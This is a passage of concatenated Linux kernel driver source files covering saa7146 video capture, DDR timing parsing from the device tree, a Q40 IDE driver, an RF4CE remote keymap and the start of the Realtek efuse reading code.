	if( 0 != planar ) {
		/* turn on video-dma2 */
		WRITE_RPS0(CMD_WR_REG_MASK | (MC1/4));
		WRITE_RPS0(MASK_05 | MASK_21);	/* => mask */
		WRITE_RPS0(MASK_05 | MASK_21);	/* => values */

		/* turn on video-dma3 */
		WRITE_RPS0(CMD_WR_REG_MASK | (MC1/4));
		WRITE_RPS0(MASK_04 | MASK_20);	/* => mask */
		WRITE_RPS0(MASK_04 | MASK_20);	/* => values */
	}

	/* wait for o_fid_a/b / e_fid_a/b toggle */
	if ( vv->last_field == V4L2_FIELD_INTERLACED ) {
		WRITE_RPS0(CMD_PAUSE | o_wait);
		WRITE_RPS0(CMD_PAUSE | e_wait);
	} else if ( vv->last_field == V4L2_FIELD_TOP ) {
		WRITE_RPS0(CMD_PAUSE | (vv->current_hps_sync == SAA7146_HPS_SYNC_PORT_A ? MASK_10 : MASK_09));
		WRITE_RPS0(CMD_PAUSE | o_wait);
	} else if ( vv->last_field == V4L2_FIELD_BOTTOM ) {
		WRITE_RPS0(CMD_PAUSE | (vv->current_hps_sync == SAA7146_HPS_SYNC_PORT_A ? MASK_10 : MASK_09));
		WRITE_RPS0(CMD_PAUSE | e_wait);
	}

	/* turn off video-dma1 */
	WRITE_RPS0(CMD_WR_REG_MASK | (MC1/4));
	WRITE_RPS0(MASK_22 | MASK_06);	/* => mask */
	WRITE_RPS0(MASK_22);		/* => values */

	if( 0 != planar ) {
		/* turn off video-dma2 */
		WRITE_RPS0(CMD_WR_REG_MASK | (MC1/4));
		WRITE_RPS0(MASK_05 | MASK_21);	/* => mask */
		WRITE_RPS0(MASK_21);		/* => values */

		/* turn off video-dma3 */
		WRITE_RPS0(CMD_WR_REG_MASK | (MC1/4));
		WRITE_RPS0(MASK_04 | MASK_20);	/* => mask */
		WRITE_RPS0(MASK_20);		/* => values */
	}

	/* generate interrupt */
	WRITE_RPS0(CMD_INTERRUPT);

	/* stop */
	WRITE_RPS0(CMD_STOP);
}
/*
 * Arm a capture of @buf: resync if the previous frame finished (protection
 * address register reads 0), program the scaler window/format, alternate
 * the expected field for ALTERNATE captures, build the DMA descriptors and
 * the RPS program, then point RPS0 at the program and start it.
 * @next is currently unused beyond the debug trace.
 */
void saa7146_set_capture(struct saa7146_dev *dev, struct saa7146_buf *buf, struct saa7146_buf *next)
{
	struct saa7146_format *sfmt = saa7146_format_by_fourcc(dev,buf->fmt->pixelformat);
	struct saa7146_vv *vv = dev->vv_data;
	u32 vdma1_prot_addr;

	DEB_CAP("buf:%p, next:%p\n", buf, next);

	vdma1_prot_addr = saa7146_read(dev, PROT_ADDR1);
	if( 0 == vdma1_prot_addr ) {
		/* clear out beginning of streaming bit (rps register 0)*/
		DEB_CAP("forcing sync to new frame\n");
		saa7146_write(dev, MC2, MASK_27 );
	}

	saa7146_set_window(dev, buf->fmt->width, buf->fmt->height, buf->fmt->field);
	saa7146_set_output_format(dev, sfmt->trans);
	saa7146_disable_clipping(dev);

	/* for single-field capture, flip which field we grab next */
	if ( vv->last_field == V4L2_FIELD_INTERLACED ) {
		/* interlaced: nothing to alternate */
	} else if ( vv->last_field == V4L2_FIELD_TOP ) {
		vv->last_field = V4L2_FIELD_BOTTOM;
	} else if ( vv->last_field == V4L2_FIELD_BOTTOM ) {
		vv->last_field = V4L2_FIELD_TOP;
	}

	if( 0 != IS_PLANAR(sfmt->trans)) {
		calculate_video_dma_grab_planar(dev, buf);
		program_capture_engine(dev,1);
	} else {
		calculate_video_dma_grab_packed(dev, buf);
		program_capture_engine(dev,0);
	}

/*
	printk("vdma%d.base_even:     0x%08x\n", 1,saa7146_read(dev,BASE_EVEN1));
	printk("vdma%d.base_odd:      0x%08x\n", 1,saa7146_read(dev,BASE_ODD1));
	printk("vdma%d.prot_addr:     0x%08x\n", 1,saa7146_read(dev,PROT_ADDR1));
	printk("vdma%d.base_page:     0x%08x\n", 1,saa7146_read(dev,BASE_PAGE1));
	printk("vdma%d.pitch:         0x%08x\n", 1,saa7146_read(dev,PITCH1));
	printk("vdma%d.num_line_byte: 0x%08x\n", 1,saa7146_read(dev,NUM_LINE_BYTE1));
	printk("vdma%d => vptr      : 0x%08x\n", 1,saa7146_read(dev,PCI_VDP1));
*/

	/* write the address of the rps-program */
	saa7146_write(dev, RPS_ADDR0, dev->d_rps0.dma_handle);

	/* turn on rps */
	saa7146_write(dev, MC1, (MASK_12 | MASK_28));
}
| gpl-2.0 |
k4k/linux | drivers/memory/of_memory.c | 4356 | 4915 | /*
* OpenFirmware helpers for memory drivers
*
* Copyright (C) 2012 Texas Instruments, Inc.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*/
#include <linux/device.h>
#include <linux/platform_device.h>
#include <linux/list.h>
#include <linux/of.h>
#include <linux/gfp.h>
#include <memory/jedec_ddr.h>
#include <linux/export.h>
/**
* of_get_min_tck() - extract min timing values for ddr
* @np: pointer to ddr device tree node
* @device: device requesting for min timing values
*
* Populates the lpddr2_min_tck structure by extracting data
* from device tree node. Returns a pointer to the populated
* structure. If any error in populating the structure, returns
* default min timings provided by JEDEC.
*/
const struct lpddr2_min_tck *of_get_min_tck(struct device_node *np,
		struct device *dev)
{
	struct lpddr2_min_tck *tck;
	int err = 0;

	tck = devm_kzalloc(dev, sizeof(*tck), GFP_KERNEL);
	if (!tck)
		goto default_min_tck;

	/* read every per-parameter minimum (in tCK units) from the DT node;
	 * any failure makes us fall back to the JEDEC defaults */
#define GET_MIN_TCK(prop, field) \
	(err |= of_property_read_u32(np, prop, &tck->field))
	GET_MIN_TCK("tRPab-min-tck", tRPab);
	GET_MIN_TCK("tRCD-min-tck", tRCD);
	GET_MIN_TCK("tWR-min-tck", tWR);
	GET_MIN_TCK("tRASmin-min-tck", tRASmin);
	GET_MIN_TCK("tRRD-min-tck", tRRD);
	GET_MIN_TCK("tWTR-min-tck", tWTR);
	GET_MIN_TCK("tXP-min-tck", tXP);
	GET_MIN_TCK("tRTP-min-tck", tRTP);
	GET_MIN_TCK("tCKE-min-tck", tCKE);
	GET_MIN_TCK("tCKESR-min-tck", tCKESR);
	GET_MIN_TCK("tFAW-min-tck", tFAW);
#undef GET_MIN_TCK

	if (err) {
		devm_kfree(dev, tck);
		goto default_min_tck;
	}

	return tck;

default_min_tck:
	dev_warn(dev, "%s: using default min-tck values\n", __func__);
	return &lpddr2_jedec_min_tck;
}
EXPORT_SYMBOL(of_get_min_tck);
/*
 * Read one jedec,lpddr2-timings node into @tim.  Returns 0 only when
 * every property was present and parsed; any other value means at least
 * one read failed.
 */
static int of_do_get_timings(struct device_node *np,
		struct lpddr2_timings *tim)
{
	int err;

#define GET_TIM(prop, field) of_property_read_u32(np, prop, &tim->field)
	err  = GET_TIM("max-freq", max_freq);
	err |= GET_TIM("min-freq", min_freq);
	err |= GET_TIM("tRPab", tRPab);
	err |= GET_TIM("tRCD", tRCD);
	err |= GET_TIM("tWR", tWR);
	err |= GET_TIM("tRAS-min", tRAS_min);
	err |= GET_TIM("tRRD", tRRD);
	err |= GET_TIM("tWTR", tWTR);
	err |= GET_TIM("tXP", tXP);
	err |= GET_TIM("tRTP", tRTP);
	err |= GET_TIM("tCKESR", tCKESR);
	err |= GET_TIM("tDQSCK-max", tDQSCK_max);
	err |= GET_TIM("tFAW", tFAW);
	err |= GET_TIM("tZQCS", tZQCS);
	err |= GET_TIM("tZQCL", tZQCL);
	err |= GET_TIM("tZQinit", tZQinit);
	err |= GET_TIM("tRAS-max-ns", tRAS_max_ns);
	err |= GET_TIM("tDQSCK-max-derated", tDQSCK_max_derated);
#undef GET_TIM

	return err;
}
/**
* of_get_ddr_timings() - extracts the ddr timings and updates no of
* frequencies available.
* @np_ddr: Pointer to ddr device tree node
* @dev: Device requesting for ddr timings
* @device_type: Type of ddr(LPDDR2 S2/S4)
* @nr_frequencies: No of frequencies available for ddr
* (updated by this function)
*
* Populates lpddr2_timings structure by extracting data from device
* tree node. Returns pointer to populated structure. If any error
* while populating, returns default timings provided by JEDEC.
*/
const struct lpddr2_timings *of_get_ddr_timings(struct device_node *np_ddr,
		struct device *dev, u32 device_type, u32 *nr_frequencies)
{
	struct lpddr2_timings *timings = NULL;
	u32 arr_sz = 0, i = 0;
	struct device_node *np_tim;
	char *tim_compat = NULL;

	switch (device_type) {
	case DDR_TYPE_LPDDR2_S2:
	case DDR_TYPE_LPDDR2_S4:
		tim_compat = "jedec,lpddr2-timings";
		break;
	default:
		dev_warn(dev, "%s: un-supported memory type\n", __func__);
		/*
		 * BUG FIX: the old code fell out of the switch with
		 * tim_compat uninitialized and passed the garbage pointer
		 * to of_device_is_compatible().  Fall back to the JEDEC
		 * defaults instead.
		 */
		goto default_timings;
	}

	/* count matching timing child nodes to size the array */
	for_each_child_of_node(np_ddr, np_tim)
		if (of_device_is_compatible(np_tim, tim_compat))
			arr_sz++;

	if (arr_sz)
		timings = devm_kzalloc(dev, sizeof(*timings) * arr_sz,
			GFP_KERNEL);

	if (!timings)
		goto default_timings;

	/* fill one lpddr2_timings entry per matching child; any parse
	 * failure discards the whole array and falls back to defaults */
	for_each_child_of_node(np_ddr, np_tim) {
		if (of_device_is_compatible(np_tim, tim_compat)) {
			if (of_do_get_timings(np_tim, &timings[i])) {
				devm_kfree(dev, timings);
				goto default_timings;
			}
			i++;
		}
	}

	*nr_frequencies = arr_sz;

	return timings;

default_timings:
	dev_warn(dev, "%s: using default timings\n", __func__);
	*nr_frequencies = ARRAY_SIZE(lpddr2_jedec_timings);
	return lpddr2_jedec_timings;
}
EXPORT_SYMBOL(of_get_ddr_timings);
| gpl-2.0 |
ericli1989/linux-2.6.32.67 | drivers/ide/q40ide.c | 4612 | 4195 | /*
* Q40 I/O port IDE Driver
*
* (c) Richard Zidlicky
*
* This file is subject to the terms and conditions of the GNU General Public
* License. See the file COPYING in the main directory of this archive for
* more details.
*
*
*/
#include <linux/types.h>
#include <linux/mm.h>
#include <linux/interrupt.h>
#include <linux/blkdev.h>
#include <linux/ide.h>
#include <asm/ide.h>
/*
* Bases of the IDE interfaces
*/
#define Q40IDE_NUM_HWIFS 2
#define PCIDE_BASE1 0x1f0
#define PCIDE_BASE2 0x170
#define PCIDE_BASE3 0x1e8
#define PCIDE_BASE4 0x168
#define PCIDE_BASE5 0x1e0
#define PCIDE_BASE6 0x160
static const unsigned long pcide_bases[Q40IDE_NUM_HWIFS] = {
PCIDE_BASE1, PCIDE_BASE2, /* PCIDE_BASE3, PCIDE_BASE4 , PCIDE_BASE5,
PCIDE_BASE6 */
};
/*
 * Map a legacy ISA IDE port base to its conventional IRQ line.
 * Unknown bases yield 0 (no IRQ).
 */
static int q40ide_default_irq(unsigned long base)
{
	if (base == 0x1f0)
		return 14;
	if (base == 0x170)
		return 15;
	if (base == 0x1e8)
		return 11;
	return 0;
}
/*
* Addresses are pretranslated for Q40 ISA access.
*/
/*
 * Fill @hw with the Q40-pretranslated ISA addresses of the task-file
 * registers for a controller at @base, and record @irq.  Only the data
 * register is mapped 16-bit wide (Q40_ISA_IO_W); everything else is a
 * byte port.  The control register sits at the conventional base+0x206.
 */
static void q40_ide_setup_ports(struct ide_hw *hw, unsigned long base, int irq)
{
	memset(hw, 0, sizeof(*hw));
	/* BIG FAT WARNING: 
	   assumption: only DATA port is ever used in 16 bit mode */
	hw->io_ports.data_addr = Q40_ISA_IO_W(base);
	hw->io_ports.error_addr = Q40_ISA_IO_B(base + 1);
	hw->io_ports.nsect_addr = Q40_ISA_IO_B(base + 2);
	hw->io_ports.lbal_addr = Q40_ISA_IO_B(base + 3);
	hw->io_ports.lbam_addr = Q40_ISA_IO_B(base + 4);
	hw->io_ports.lbah_addr = Q40_ISA_IO_B(base + 5);
	hw->io_ports.device_addr = Q40_ISA_IO_B(base + 6);
	hw->io_ports.status_addr = Q40_ISA_IO_B(base + 7);
	hw->io_ports.ctl_addr = Q40_ISA_IO_B(base + 0x206);

	hw->irq = irq;
}
/*
 * Read @len bytes from the (byte-swapped) Q40 data port.  Filesystem
 * transfers from disks are read without swapping; everything else goes
 * through the swapping accessor.
 */
static void q40ide_input_data(ide_drive_t *drive, struct ide_cmd *cmd,
			      void *buf, unsigned int len)
{
	unsigned long port = drive->hwif->io_ports.data_addr;
	unsigned int words = (len + 1) / 2;

	if (drive->media == ide_disk && cmd && (cmd->tf_flags & IDE_TFLAG_FS))
		__ide_mm_insw(port, buf, words);
	else
		raw_insw_swapw((u16 *)port, buf, words);
}
/*
 * Write @len bytes to the (byte-swapped) Q40 data port; mirror image of
 * q40ide_input_data().
 */
static void q40ide_output_data(ide_drive_t *drive, struct ide_cmd *cmd,
			       void *buf, unsigned int len)
{
	unsigned long port = drive->hwif->io_ports.data_addr;
	unsigned int words = (len + 1) / 2;

	if (drive->media == ide_disk && cmd && (cmd->tf_flags & IDE_TFLAG_FS))
		__ide_mm_outsw(port, buf, words);
	else
		raw_outsw_swapw((u16 *)port, buf, words);
}
/* Q40 has a byte-swapped IDE interface: reuse the generic task-file ops
 * and override only the data-transfer hooks with the swapping variants
 * defined above. */
static const struct ide_tp_ops q40ide_tp_ops = {
	.exec_command		= ide_exec_command,
	.read_status		= ide_read_status,
	.read_altstatus		= ide_read_altstatus,
	.write_devctl		= ide_write_devctl,

	.dev_select		= ide_dev_select,
	.tf_load		= ide_tf_load,
	.tf_read		= ide_tf_read,

	.input_data		= q40ide_input_data,
	.output_data		= q40ide_output_data,
};
/* Port description shared by both interfaces: memory-mapped I/O, no DMA,
 * shared interrupt line. */
static const struct ide_port_info q40ide_port_info = {
	.tp_ops			= &q40ide_tp_ops,
	.host_flags		= IDE_HFLAG_MMIO | IDE_HFLAG_NO_DMA,
	.irq_flags		= IRQF_SHARED,
	.chipset		= ide_generic,
};
/*
* the static array is needed to have the name reported in /proc/ioports,
* hwif->name unfortunately isn't available yet
*/
static const char *q40_ide_names[Q40IDE_NUM_HWIFS]={
"ide0", "ide1"
};
/*
* Probe for Q40 IDE interfaces
*/
/*
 * Probe for the Q40 IDE interfaces: reserve the task-file and control
 * port regions for each known base, build the ide_hw descriptions and
 * register them with the IDE core.  An interface whose ports cannot be
 * reserved is skipped (its hws[] slot stays NULL).
 */
static int __init q40ide_init(void)
{
    int i;
    struct ide_hw hw[Q40IDE_NUM_HWIFS], *hws[] = { NULL, NULL };

    if (!MACH_IS_Q40)
      return -ENODEV;

    printk(KERN_INFO "ide: Q40 IDE controller\n");

    for (i = 0; i < Q40IDE_NUM_HWIFS; i++) {
	const char *name = q40_ide_names[i];

	if (!request_region(pcide_bases[i], 8, name)) {
		printk("could not reserve ports %lx-%lx for %s\n",
		       pcide_bases[i],pcide_bases[i]+8,name);
		continue;
	}
	/* the control register lives apart from the task-file block */
	if (!request_region(pcide_bases[i]+0x206, 1, name)) {
		printk("could not reserve port %lx for %s\n",
		       pcide_bases[i]+0x206,name);
		release_region(pcide_bases[i], 8);
		continue;
	}
	q40_ide_setup_ports(&hw[i], pcide_bases[i],
			q40ide_default_irq(pcide_bases[i]));

	hws[i] = &hw[i];
    }

    return ide_host_add(&q40ide_port_info, hws, Q40IDE_NUM_HWIFS, NULL);
}
module_init(q40ide_init);
MODULE_LICENSE("GPL");
| gpl-2.0 |
lordeko/Alucard-Kernel-jfltexx | drivers/media/rc/keymaps/rc-ue-rf4ce.c | 4612 | 2008 | /* Copyright (c) 2012, The Linux Foundation. All rights reserved.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 and
* only version 2 as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/
#include <linux/module.h>
#include <media/rc-map.h>
/* Scancode -> Linux input keycode table for the UE RF4CE remote.
 * Entry order is irrelevant; lookup is by scancode. */
static struct rc_map_table ue_rf4ce[] = {
	{ 0x0a, KEY_SETUP },
	{ 0x6b, KEY_POWER },
	{ 0x00, KEY_OK },
	{ 0x03, KEY_LEFT },
	{ 0x04, KEY_RIGHT },
	{ 0x01, KEY_UP },
	{ 0x02, KEY_DOWN },
	{ 0x53, KEY_HOMEPAGE },
	{ 0x0d, KEY_EXIT },
	{ 0x72, KEY_TV },
	{ 0x73, KEY_VIDEO },
	{ 0x74, KEY_PC },
	{ 0x71, KEY_AUX },
	{ 0x45, KEY_STOP },
	{ 0x0b, KEY_LIST },
	{ 0x47, KEY_RECORD },
	{ 0x48, KEY_REWIND },
	{ 0x44, KEY_PLAY },
	{ 0x49, KEY_FASTFORWARD },
	{ 0x4c, KEY_BACK },
	{ 0x46, KEY_PAUSE },
	{ 0x4b, KEY_NEXT },
	{ 0x41, KEY_VOLUMEUP },
	{ 0x42, KEY_VOLUMEDOWN },
	{ 0x32, KEY_LAST },
	{ 0x43, KEY_MUTE },
	{ 0x30, KEY_CHANNELUP },
	{ 0x31, KEY_CHANNELDOWN },
	/* numeric pad: scancodes 0x20..0x29 map to digits 0..9 */
	{ 0x20, KEY_0 },
	{ 0x21, KEY_1 },
	{ 0x22, KEY_2 },
	{ 0x23, KEY_3 },
	{ 0x24, KEY_4 },
	{ 0x25, KEY_5 },
	{ 0x26, KEY_6 },
	{ 0x27, KEY_7 },
	{ 0x28, KEY_8 },
	{ 0x29, KEY_9 },
	{ 0x34, KEY_TV2 },
	{ 0x2b, KEY_ENTER },
	{ 0x35, KEY_INFO },
	{ 0x09, KEY_MENU },
};
/* rc-core registration wrapper around the table above. */
static struct rc_map_list ue_rf4ce_map = {
	.map = {
		.scan    = ue_rf4ce,
		.size    = ARRAY_SIZE(ue_rf4ce),
		.rc_type = RC_TYPE_OTHER,
		.name    = RC_MAP_UE_RF4CE,
	}
};
/* Module init: register the keymap with rc-core. */
static int __init init_rc_map_ue_rf4ce(void)
{
	return rc_map_register(&ue_rf4ce_map);
}
/* Module exit: unregister the keymap from rc-core. */
static void __exit exit_rc_map_ue_rf4ce(void)
{
	rc_map_unregister(&ue_rf4ce_map);
}
module_init(init_rc_map_ue_rf4ce)
module_exit(exit_rc_map_ue_rf4ce)
MODULE_DESCRIPTION("UE RF4CE Remote Keymap ");
MODULE_LICENSE("GPL v2");
| gpl-2.0 |
bensonhsu2013/diff-T210-T110 | drivers/net/wireless/rtlwifi/efuse.c | 4868 | 33037 | /******************************************************************************
*
* Copyright(c) 2009-2012 Realtek Corporation.
*
* Tmis program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* Tmis program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along with
* tmis program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110, USA
*
* Tme full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <wlanfae@realtek.com>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
*
* Larry Finger <Larry.Finger@lwfinger.net>
*
*****************************************************************************/
#include <linux/export.h>
#include "wifi.h"
#include "efuse.h"
/* A physical-efuse programming packet: one header byte plus up to
 * 8 data bytes (4 words). */
static const u8 MAX_PGPKT_SIZE = 9;
static const u8 PGPKT_DATA_SIZE = 8;
/* Physical efuse size, and the tail area that must never be written
 * (checked in efuse_shadow_update_chk()). */
static const int EFUSE_MAX_SIZE = 512;

static const u8 EFUSE_OOB_PROTECT_BYTES = 15;

/* Efuse layout table for RTL8712 SDIO parts; entry field meanings are
 * defined by struct efuse_map in the driver headers.
 * NOTE(review): not referenced in this file -- presumably consumed
 * elsewhere or kept for reference. */
static const struct efuse_map RTL8712_SDIO_EFUSE_TABLE[] = {
	{0, 0, 0, 2},
	{0, 1, 0, 2},
	{0, 2, 0, 2},
	{1, 0, 0, 1},
	{1, 0, 1, 1},
	{1, 1, 0, 1},
	{1, 1, 1, 3},
	{1, 3, 0, 17},
	{3, 3, 1, 48},
	{10, 0, 0, 6},
	{10, 3, 0, 1},
	{10, 3, 1, 1},
	{11, 0, 0, 28}
};
static void efuse_shadow_read_1byte(struct ieee80211_hw *hw, u16 offset,
u8 *value);
static void efuse_shadow_read_2byte(struct ieee80211_hw *hw, u16 offset,
u16 *value);
static void efuse_shadow_read_4byte(struct ieee80211_hw *hw, u16 offset,
u32 *value);
static void efuse_shadow_write_1byte(struct ieee80211_hw *hw, u16 offset,
u8 value);
static void efuse_shadow_write_2byte(struct ieee80211_hw *hw, u16 offset,
u16 value);
static void efuse_shadow_write_4byte(struct ieee80211_hw *hw, u16 offset,
u32 value);
static int efuse_one_byte_read(struct ieee80211_hw *hw, u16 addr,
u8 *data);
static int efuse_one_byte_write(struct ieee80211_hw *hw, u16 addr,
u8 data);
static void efuse_read_all_map(struct ieee80211_hw *hw, u8 *efuse);
static int efuse_pg_packet_read(struct ieee80211_hw *hw, u8 offset,
u8 *data);
static int efuse_pg_packet_write(struct ieee80211_hw *hw, u8 offset,
u8 word_en, u8 *data);
static void efuse_word_enable_data_read(u8 word_en, u8 *sourdata,
u8 *targetdata);
static u8 efuse_word_enable_data_write(struct ieee80211_hw *hw,
u16 efuse_addr, u8 word_en, u8 *data);
static void efuse_power_switch(struct ieee80211_hw *hw, u8 write,
u8 pwrstate);
static u16 efuse_get_current_size(struct ieee80211_hw *hw);
static u8 efuse_calculate_word_cnts(u8 word_en);
/*
 * Prepare the chip for efuse access.  The register sequence is: set
 * bit 5 of SYS_FUNC_EN+1, clear bit 0 of SYS_ISO_CTRL+1, set bit 7 of
 * EFUSE_TEST+3, write 0x3 to 0x2F8 and finally 0x72 to EFUSE_CTRL+3.
 * Register offsets come from the per-chip maps[] table; do not reorder.
 */
void efuse_initialize(struct ieee80211_hw *hw)
{
	struct rtl_priv *rtlpriv = rtl_priv(hw);
	u8 bytetemp;
	u8 temp;

	bytetemp = rtl_read_byte(rtlpriv, rtlpriv->cfg->maps[SYS_FUNC_EN] + 1);
	temp = bytetemp | 0x20;
	rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[SYS_FUNC_EN] + 1, temp);

	bytetemp = rtl_read_byte(rtlpriv, rtlpriv->cfg->maps[SYS_ISO_CTRL] + 1);
	temp = bytetemp & 0xFE;
	rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[SYS_ISO_CTRL] + 1, temp);

	bytetemp = rtl_read_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_TEST] + 3);
	temp = bytetemp | 0x80;
	rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_TEST] + 3, temp);

	rtl_write_byte(rtlpriv, 0x2F8, 0x3);

	rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 3, 0x72);
}
/*
 * Read one byte from the physical efuse at @address.  Writes the 10-bit
 * address into EFUSE_CTRL+1/+2, clears the "done" bit (bit 7 of
 * EFUSE_CTRL+3) to start the read, then polls it back with a 1000-iteration
 * bail-out.  Returns 0xFF for addresses beyond the chip's efuse size.
 * Note: on poll timeout the data register is read anyway and may be stale.
 */
u8 efuse_read_1byte(struct ieee80211_hw *hw, u16 address)
{
	struct rtl_priv *rtlpriv = rtl_priv(hw);
	u8 data;
	u8 bytetemp;
	u8 temp;
	u32 k = 0;
	const u32 efuse_len =
		rtlpriv->cfg->maps[EFUSE_REAL_CONTENT_SIZE];

	if (address < efuse_len) {
		/* low 8 address bits */
		temp = address & 0xFF;
		rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 1,
			       temp);
		bytetemp = rtl_read_byte(rtlpriv,
					 rtlpriv->cfg->maps[EFUSE_CTRL] + 2);
		/* high 2 address bits, preserving the other control bits */
		temp = ((address >> 8) & 0x03) | (bytetemp & 0xFC);
		rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 2,
			       temp);

		/* clear bit 7 to trigger the read */
		bytetemp = rtl_read_byte(rtlpriv,
					 rtlpriv->cfg->maps[EFUSE_CTRL] + 3);
		temp = bytetemp & 0x7F;
		rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 3,
			       temp);

		/* poll for completion (bit 7 set again) */
		bytetemp = rtl_read_byte(rtlpriv,
					 rtlpriv->cfg->maps[EFUSE_CTRL] + 3);
		while (!(bytetemp & 0x80)) {
			bytetemp = rtl_read_byte(rtlpriv,
						 rtlpriv->cfg->
						 maps[EFUSE_CTRL] + 3);
			k++;
			if (k == 1000) {
				k = 0;
				break;
			}
		}
		data = rtl_read_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL]);
		return data;
	} else
		return 0xFF;
}
EXPORT_SYMBOL(efuse_read_1byte);
/*
 * Program one byte of the physical efuse at @address.  Mirrors
 * efuse_read_1byte(): data into EFUSE_CTRL, address into +1/+2, then
 * bit 7 of +3 is SET to start the write and polled until it clears
 * (100-iteration bail-out).  Out-of-range addresses are ignored.
 */
void efuse_write_1byte(struct ieee80211_hw *hw, u16 address, u8 value)
{
	struct rtl_priv *rtlpriv = rtl_priv(hw);
	u8 bytetemp;
	u8 temp;
	u32 k = 0;
	const u32 efuse_len =
		rtlpriv->cfg->maps[EFUSE_REAL_CONTENT_SIZE];

	RT_TRACE(rtlpriv, COMP_EFUSE, DBG_LOUD, "Addr=%x Data =%x\n",
		 address, value);

	if (address < efuse_len) {
		rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL], value);

		/* low 8 address bits */
		temp = address & 0xFF;
		rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 1,
			       temp);
		bytetemp = rtl_read_byte(rtlpriv,
					 rtlpriv->cfg->maps[EFUSE_CTRL] + 2);

		/* high 2 address bits, preserving the other control bits */
		temp = ((address >> 8) & 0x03) | (bytetemp & 0xFC);
		rtl_write_byte(rtlpriv,
			       rtlpriv->cfg->maps[EFUSE_CTRL] + 2, temp);

		/* set bit 7 to trigger the write */
		bytetemp = rtl_read_byte(rtlpriv,
					 rtlpriv->cfg->maps[EFUSE_CTRL] + 3);
		temp = bytetemp | 0x80;
		rtl_write_byte(rtlpriv,
			       rtlpriv->cfg->maps[EFUSE_CTRL] + 3, temp);

		/* poll until the hardware clears the busy bit */
		bytetemp = rtl_read_byte(rtlpriv,
					 rtlpriv->cfg->maps[EFUSE_CTRL] + 3);
		while (bytetemp & 0x80) {
			bytetemp = rtl_read_byte(rtlpriv,
						 rtlpriv->cfg->
						 maps[EFUSE_CTRL] + 3);
			k++;
			if (k == 100) {
				k = 0;
				break;
			}
		}
	}
}
/*
 * Raw single-byte efuse read used by the map walker: program the 10-bit
 * address, start the read, poll the done bit (up to 10000 iterations),
 * wait 50us and store the data byte into *pbuf.  No range checking --
 * callers bound _offset themselves.
 */
void read_efuse_byte(struct ieee80211_hw *hw, u16 _offset, u8 *pbuf)
{
	struct rtl_priv *rtlpriv = rtl_priv(hw);
	u32 value32;
	u8 readbyte;
	u16 retry;

	rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 1,
		       (_offset & 0xff));
	readbyte = rtl_read_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 2);
	rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 2,
		       ((_offset >> 8) & 0x03) | (readbyte & 0xfc));

	/* clear bit 31 (done flag) to trigger the read */
	readbyte = rtl_read_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 3);
	rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 3,
		       (readbyte & 0x7f));

	retry = 0;
	value32 = rtl_read_dword(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL]);
	while (!(((value32 >> 24) & 0xff) & 0x80) && (retry < 10000)) {
		value32 = rtl_read_dword(rtlpriv,
					 rtlpriv->cfg->maps[EFUSE_CTRL]);
		retry++;
	}
	udelay(50);
	value32 = rtl_read_dword(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL]);

	*pbuf = (u8) (value32 & 0xff);
}
/*
 * Decode the physical efuse into the logical byte map and copy
 * @_size_byte bytes starting at @_offset into @pbuf.  The physical
 * format is a sequence of packets: a header byte (high nibble = section,
 * low nibble = active-low word-enable mask) followed by up to four
 * little-endian data words.  Unprogrammed cells read 0xFF.  Also updates
 * the cached usage statistics in rtlefuse and pushes them to the HAL.
 */
void read_efuse(struct ieee80211_hw *hw, u16 _offset, u16 _size_byte, u8 *pbuf)
{
	struct rtl_priv *rtlpriv = rtl_priv(hw);
	struct rtl_efuse *rtlefuse = rtl_efuse(rtl_priv(hw));
	u8 *efuse_tbl;
	u8 rtemp8[1];
	u16 efuse_addr = 0;
	u8 offset, wren;
	u16 i;
	u16 j;
	const u16 efuse_max_section =
		rtlpriv->cfg->maps[EFUSE_MAX_SECTION_MAP];
	const u32 efuse_len =
		rtlpriv->cfg->maps[EFUSE_REAL_CONTENT_SIZE];
	u16 **efuse_word;
	u16 efuse_utilized = 0;
	u8 efuse_usage;

	/* reject reads running past the logical map */
	if ((_offset + _size_byte) > rtlpriv->cfg->maps[EFUSE_HWSET_MAX_SIZE]) {
		RT_TRACE(rtlpriv, COMP_EFUSE, DBG_LOUD,
			 "read_efuse(): Invalid offset(%#x) with read bytes(%#x)!!\n",
			 _offset, _size_byte);
		return;
	}

	/* allocate memory for efuse_tbl and efuse_word */
